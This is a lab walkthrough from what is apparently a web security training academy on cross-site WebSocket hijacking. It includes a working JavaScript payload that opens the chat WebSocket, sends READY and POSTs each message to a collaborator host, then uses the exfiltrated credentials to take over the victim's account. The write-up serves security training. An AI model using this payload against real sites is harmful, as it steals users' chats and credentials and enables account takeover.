Cross-site WebSocket hijacking

Description

This online shop has a live chat feature implemented using WebSockets.

Reproduction and proof of concept

  1. Click “Live chat” and send a chat message.

  2. Reload the page.

  3. In Burp Proxy, in the WebSockets history tab, observe that the READY command retrieves past chat messages from the server.

  4. In Burp Proxy, in the HTTP history tab, find the WebSocket handshake request. Observe that the request has no CSRF tokens.

  5. Right-click on the handshake request and select Copy URL.

  6. In browser, go to the exploit server and paste this template into the Body section of the form:

<script>
    var ws = new WebSocket('wss://0a18000803f6c281c1c86b78006d00ba.web-security-academy.net/chat');
    ws.onopen = function() {
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        fetch('https://collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>

  1. Replace the WebSocket URL with the URL from the WebSocket handshake (lab-id.web-security-academy.net/chat). Make sure to change the protocol from https:// to wss://. Replace collaborator-url with a payload generated by Burp Collaborator Client. Mind the https:// remains in the URL.

Websockets

  1. Store and click View exploit.

  2. Poll for interactions using Burp Collaborator client. Verify that the attack has successfully retrieved your chat history and exfiltrated it via Burp Collaborator. For every message in the chat, Burp Collaborator has received an HTTP request. The request body contains the full contents of the chat message in JSON format. Note that these messages may not be received in the correct order.

  3. Go back to the exploit server and deliver the exploit to the victim.

  4. Poll now for interactions using Burp Collaborator client again. More HTTP interactions have been received, now containing the victim’s chat history. One of them contains the victim’s username and password.

Websockets

  1. Use the exfiltrated credentials to log in to the victim user’s account.

Websockets

Exploitability

An attacker will need to use the exploit server to host an HTML/JavaScript payload that uses a cross-site WebSocket hijacking attack to exfiltrate the victim’s chat history, then use this to gain access to their account.